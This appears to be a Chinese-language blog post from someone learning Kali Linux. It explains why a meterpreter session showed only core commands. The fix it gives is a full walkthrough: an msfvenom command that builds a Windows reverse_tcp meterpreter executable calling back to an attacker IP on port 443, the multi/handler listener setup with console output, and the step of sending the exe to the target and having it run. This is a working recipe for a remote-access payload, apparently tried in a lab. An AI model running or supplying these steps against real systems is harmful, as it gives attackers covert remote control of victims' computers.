今天在使用kali进行学习是,发现在进入meterpreter控制台后只有core命令,刚开始以为是虚拟机坏掉了,后来发现,是因为没有连接成功,
1.问题重现:
root@qzwhost:~# msfconsole
_ _
/ \ /\ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_
|/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\
=[ metasploit v4.16.52-dev- ]
+ -- --=[ 1751 exploits - 1005 auxiliary - 305 post ]
+ -- --=[ 536 payloads - 40 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use exploit/multi/handler
msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.52.133
LHOST => 192.168.52.133
msf exploit(multi/handler) > set LPORT 443
LPORT => 443
msf exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 192.168.52.133:443
以上的命令是没有问题的,问题在于连接未建立成功
在客户机上直接访问http://192.168.52.133:443,在kali上可以看到建立连接
此时我用sessions命令查看后连接
可以成功登陆到meterpreter控制台,help查看发现只有基础命令
输入shell试图连接到客户机时失败,报错meterpreter > shell [-] Unknown command: shell.
问题解决:
在linux shell下输入
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.52.133 LPORT=443 -f exe -o met.exe
LHOST为攻击机IP地址
将生成的met.exe发送给客户机,输入上方代码
root@qzwhost:~# msfconsole
_ _
/ \ /\ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_
|/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\
=[ metasploit v4.16.52-dev- ]
+ -- --=[ 1751 exploits - 1005 auxiliary - 305 post ]
+ -- --=[ 536 payloads - 40 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use exploit/multi/handler
msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.52.133
LHOST => 192.168.52.133
msf exploit(multi/handler) > set LPORT 443
LPORT => 443
msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.52.133:443
此时将客户机中met.exe双击启动,连接建立成功
输入shell后出现以下画面
问题解决!
如果帮助到你的话,请点关注,谢谢